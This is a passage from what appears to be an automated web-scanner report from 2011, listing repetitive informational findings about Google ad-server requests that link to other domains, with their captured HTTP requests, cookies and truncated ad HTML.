<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dfile:///C:/cdn/examples/html/capec-86-dork-xss-cross-site-scripting-examples.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.Sentrigo.com%26adT%3DDatabase%2BSecurity%2BGuide%26adU%3Dwww.symantec.com/pgp%26adT%3DSymantec%2BCommand%2BLine%26adU%3DPort80Software.com/ServerDefenderVP%26adT%3DWindows%2BServer%2BSecurity%26gl%3DUS&amp;usg=AFQjCNEvnQJ7uNM-GxRSA3iJXsKf89ApPg" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

19.34. http://googleads.g.doubleclick.net/pagead/ads

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1300998821&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2Fexamples%2Fhtml%2Fcdn.nypost.com.html&dt=1301748980173&bpp=3&shv=r20110324&jsv=r20110321-2&correlator=1301748980186&frm=0&adk=1607234649&ga_vid=673946304.1301748980&ga_sid=1301748980&ga_hid=1486977233&ga_fc=0&u_tz=-300&u_his=17&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=998&bih=1004&fu=0&ifi=1&dtd=20&xpc=CQa5baqmkH&p=http%3A//xss.cx HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; __ar_v4=%7CTEDYGTRZH5DVRIBZAHSESJ%3A20110318%3A1%7CGUKQZOPGUBBXJAG5MGCY3C%3A20110318%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110318%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110318%3A1; id=c708f553300004b|2305757/776973/15064,998766/320821/15055,1831140/746237/15055,2818894/957634/15036|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 02 Apr 2011 12:55:44 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 12285

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://xss.cx/examples/html/cdn.nypost.com.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.opnet.com/network-diagram%26adT%3DNetwork%2BDiagram%2BTool%26adU%3Ddegree-online.NECB.edu%26adT%3DAccounting%2BDegree:%2BOnline%26adU%3DEarnMyDegree.com/Art%2526amp%253BDesign%26adT%3DCreative%2BWriting%2BPrograms%26gl%3DUS&amp;usg=AFQjCNHSkGH26TMQcJYoWeXTKoe6l2CxUg" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

19.35. http://googleads.g.doubleclick.net/pagead/ads

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1301767057&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fhtml%2Fcapec-86-embedding-scripts-in-headers-xss-cross-site-scripting.html&dt=1301749057283&shv=r20110324&jsv=r20110321-2&saldr=1&correlator=1301749057291&frm=0&adk=1607234649&ga_vid=1599168405.1301749057&ga_sid=1301749057&ga_hid=268240308&ga_fc=0&u_tz=-300&u_his=22&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=998&bih=1004&eid=33895130&fu=0&ifi=1&dtd=13&xpc=inbAgl85Nb&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; __ar_v4=%7CTEDYGTRZH5DVRIBZAHSESJ%3A20110318%3A1%7CGUKQZOPGUBBXJAG5MGCY3C%3A20110318%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110318%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110318%3A1; id=c708f553300004b|2305757/776973/15064,998766/320821/15055,1831140/746237/15055,2818894/957634/15036|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 02 Apr 2011 12:57:02 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 4055

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(d,e){window.s
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/i.png' alt="(i)" border=0 height=12px width=12px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dfile:///C:/cdn/examples/html/capec-86-embedding-scripts-in-headers-xss-cross-site-scripting.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3DOpManager.ManageEngine.com%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNHlrMX8gFh5OQZUQL2ey6CkwdJJsA" target=_blank><img alt="Ads by Google" border=0 height=16px src=http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png width=78px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/abg.js"></script>
...[SNIP]...

19.36. http://googleads.g.doubleclick.net/pagead/ads

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1301766656&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fhtml%2Fcross-site-scripting-sso-xss.login.openx.org.html&dt=1301748656596&bpp=5&shv=r20110324&jsv=r20110321-2&correlator=1301748656682&frm=0&adk=1607234649&ga_vid=1633126226.1301748657&ga_sid=1301748657&ga_hid=1695340207&ga_fc=0&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=982&bih=988&fu=0&ifi=1&dtd=114&xpc=zbgGQFLVIE&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; __ar_v4=%7CTEDYGTRZH5DVRIBZAHSESJ%3A20110318%3A1%7CGUKQZOPGUBBXJAG5MGCY3C%3A20110318%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110318%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110318%3A1; id=c708f553300004b|2305757/776973/15064,998766/320821/15055,1831140/746237/15055,2818894/957634/15036|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 02 Apr 2011 12:50:20 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 12426

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dfile:///C:/cdn/examples/html/cross-site-scripting-sso-xss.login.openx.org.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dvulnerability.management.qualys.com%26adT%3DWireless%2BVulnerabilities%26adU%3Dwww.Sentrigo.com%26adT%3DDatabase%2BSecurity%2BGuide%26adU%3Dwww.symantec.com/pgp%26adT%3DSymantec%2BCommand%2BLine%26gl%3DUS&amp;usg=AFQjCNE5hjZnViYI9p0fE9b1r0bZfMaZow" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

19.37. http://googleads.g.doubleclick.net/pagead/ads

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1301766285&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fhtml%2Fcwe-79-cross-site-scripting.www.norwich.edu.html&dt=1301748285145&bpp=5&shv=r20110324&jsv=r20110321-2&correlator=1301748285207&frm=0&adk=1607234649&ga_vid=1031013934.1301748285&ga_sid=1301748285&ga_hid=1004053173&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=982&bih=1004&fu=0&ifi=1&dtd=94&xpc=4iHGLQIcCW&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; __ar_v4=%7CTEDYGTRZH5DVRIBZAHSESJ%3A20110318%3A1%7CGUKQZOPGUBBXJAG5MGCY3C%3A20110318%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110318%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110318%3A1; id=c708f553300004b|2305757/776973/15064,998766/320821/15055,1831140/746237/15055,2818894/957634/15036|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 02 Apr 2011 12:44:10 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 4656

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(a){window.sta
...[SNIP]...
<div id="google_flash_div" style="position:absolute;left:0px;z-index:1001"><OBJECT classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" id="google_flash_obj" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0" WIDTH="728" HEIGHT="90"><PARAM NAME=movie VALUE="http://pagead2.googlesyndication.com/pagead/imgad?id=CLGejuCi_6KFYBDYBRhaMgjt1P_y9_XtXQ">
...[SNIP]...
AO6AvUDAAAAxA%26num%3D1%26sig%3DAGiWqtwJr8ev6lNA5hl1lLzRKsQhlZ-VLA%26client%3Dca-pub-4063878933780912%26adurl%3Dhttp://lovealocalbusiness.intuit.com/fan%253Fcid%253Dsoc_gg_lalb__fan%2526vtid%253Dgsem"><EMBED src="http://pagead2.googlesyndication.com/pagead/imgad?id=CLGejuCi_6KFYBDYBRhaMgjt1P_y9_XtXQ" id="google_flash_embed" WIDTH="728" HEIGHT="90" WMODE="opaque" FlashVars="clickTAG=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBAbZkGhqXTdGjFo31lAeDvtGJCd7theEB7rG7zhGWk9-WSbC3jwEQARgBIL7O5Q04AFD-ueqD-P____8BYMkGoAHu8sn5A7oBCTcyOHg5MF9hc8gBBNoBTWZpbGU6Ly8vQzovY2RuL2V4YW1wbGVzL2h0bWwvY3dlLTc5LWNyb3NzLXNpdGUtc2NyaXB0aW5nLnd3dy5ub3J3aWNoLmVkdS5odG1sgAIBuAIYwAIFyALu5LYUqAMB6APGKugDqQnoA9wF6AO6AvUDAAAAxA%26num%3D1%26sig%3DAGiWqtwJr8ev6lNA5hl1lLzRKsQhlZ-VLA%26client%3Dca-pub-4063878933780912%26adurl%3Dhttp://lovealocalbusiness.intuit.com/fan%253Fcid%253Dsoc_gg_lalb__fan%2526vtid%253Dgsem" TYPE="application/x-shockwave-flash" AllowScriptAccess="never" PLUGINSPAGE="http://www.macromedia.com/go/getflashplayer"></EMBED>
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/i.png' alt="(i)" border=0 height=12px width=12px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dfile:///C:/cdn/examples/html/cwe-79-cross-site-scripting.www.norwich.edu.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3DLoveALocalBusiness.Intuit.com%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNHbo46WMAetjQAOr7yRDBN_t_7EhA" target=_blank><img alt="Ads by Google" border=0 height=16px src=http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png width=78px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/abg.js"></script>
...[SNIP]...

19.38. http://googleads.g.doubleclick.net/pagead/ads

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1300998820&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2Fexamples%2Fhtml%2Fcaptavi.com.xss-cross-site-scripting.html&dt=1301748930615&bpp=3&shv=r20110324&jsv=r20110321-2&correlator=1301748930621&frm=0&adk=1607234649&ga_vid=846263838.1301748931&ga_sid=1301748931&ga_hid=838483375&ga_fc=0&u_tz=-300&u_his=13&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=998&bih=1004&fu=0&ifi=1&dtd=11&xpc=G5y5YLdbBo&p=http%3A//xss.cx HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; __ar_v4=%7CTEDYGTRZH5DVRIBZAHSESJ%3A20110318%3A1%7CGUKQZOPGUBBXJAG5MGCY3C%3A20110318%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110318%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110318%3A1; id=c708f553300004b|2305757/776973/15064,998766/320821/15055,1831140/746237/15055,2818894/957634/15036|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 02 Apr 2011 12:54:54 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 12425

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://xss.cx/examples/html/captavi.com.xss-cross-site-scripting.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.Sentrigo.com%26adT%3DDatabase%2BSecurity%2BGuide%26adU%3Dwww.symantec.com/pgp%26adT%3DSymantec%2BCommand%2BLine%26adU%3Dvulnerability.scan.qualys.com%26adT%3DOnline%2BVulnerability%2BScan%26gl%3DUS&amp;usg=AFQjCNGcJyO_0cl68PMYA8b74TQJRmjkwA" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

19.39. http://googleads.g.doubleclick.net/pagead/ads

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1300998814&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2Fexamples%2Fhtml%2Fbluefly.com.html&dt=1301749184430&bpp=3&shv=r20110324&jsv=r20110321-2&correlator=1301749184446&frm=0&adk=1607234649&ga_vid=320306698.1301749184&ga_sid=1301749184&ga_hid=351342536&ga_fc=0&u_tz=-300&u_his=33&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=998&bih=1004&eid=33895132&fu=0&ifi=1&dtd=24&xpc=xrsCZs9tN2&p=http%3A//xss.cx HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; __ar_v4=%7CTEDYGTRZH5DVRIBZAHSESJ%3A20110318%3A1%7CGUKQZOPGUBBXJAG5MGCY3C%3A20110318%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110318%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110318%3A1; id=c708f553300004b|2305757/776973/15064,998766/320821/15055,1831140/746237/15055,2818894/957634/15036|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 02 Apr 2011 12:59:08 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 12105

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://xss.cx/examples/html/bluefly.com.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.UTI.edu/Marine%26adT%3DUTI%2BMarine%2BTech%2BSchool%26adU%3DMastersinLaw.TJSL.edu%26adT%3DMaster%2Bof%2BLaws%2BDegree%26adU%3Dwww.Fishing-In-Saskatchewan.com%26adT%3DFishing%2Bin%2BSaskatchewan%26gl%3DUS&amp;usg=AFQjCNGuKK03ZoUVv03Km5vasrNf_qsVpg" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

19.40. http://googleads.g.doubleclick.net/pagead/ads

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1301766843&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fhtml%2Fcapec-86-xss.flowplayer.org.html&dt=1301748843548&bpp=5&shv=r20110324&jsv=r20110321-2&correlator=1301748843555&frm=0&adk=1607234649&ga_vid=1094437628.1301748844&ga_sid=1301748844&ga_hid=1504562185&ga_fc=0&u_tz=-300&u_his=5&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=998&bih=1004&fu=0&ifi=1&dtd=11&xpc=eXgZqjDNsK&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; __ar_v4=%7CTEDYGTRZH5DVRIBZAHSESJ%3A20110318%3A1%7CGUKQZOPGUBBXJAG5MGCY3C%3A20110318%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110318%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110318%3A1; id=c708f553300004b|2305757/776973/15064,998766/320821/15055,1831140/746237/15055,2818894/957634/15036|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 02 Apr 2011 12:53:27 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 4283

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(d,e){window.s
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/i.png' alt="(i)" border=0 height=12px width=12px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dfile:///C:/cdn/examples/html/capec-86-xss.flowplayer.org.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3DPhilips.LifelineSystems.com%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNF24-9tQOLRJAAIU1s1Ka4M1ytLUA" target=_blank><img alt="Ads by Google" border=0 height=16px src=http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png width=78px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/abg.js"></script>
...[SNIP]...

19.41. http://googleads.g.doubleclick.net/pagead/ads

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1300998823&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2Fexamples%2Fhtml%2Fcwe-79-xss-dork-www.ovh.com.html&dt=1301748869734&bpp=3&shv=r20110324&jsv=r20110321-2&correlator=1301748869748&frm=0&adk=1607234649&ga_vid=1815080875.1301748870&ga_sid=1301748870&ga_hid=1055404040&ga_fc=0&u_tz=-300&u_his=8&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=998&bih=1004&eid=33895132&fu=0&ifi=1&dtd=19&xpc=b3g2tgY6a4&p=http%3A//xss.cx HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
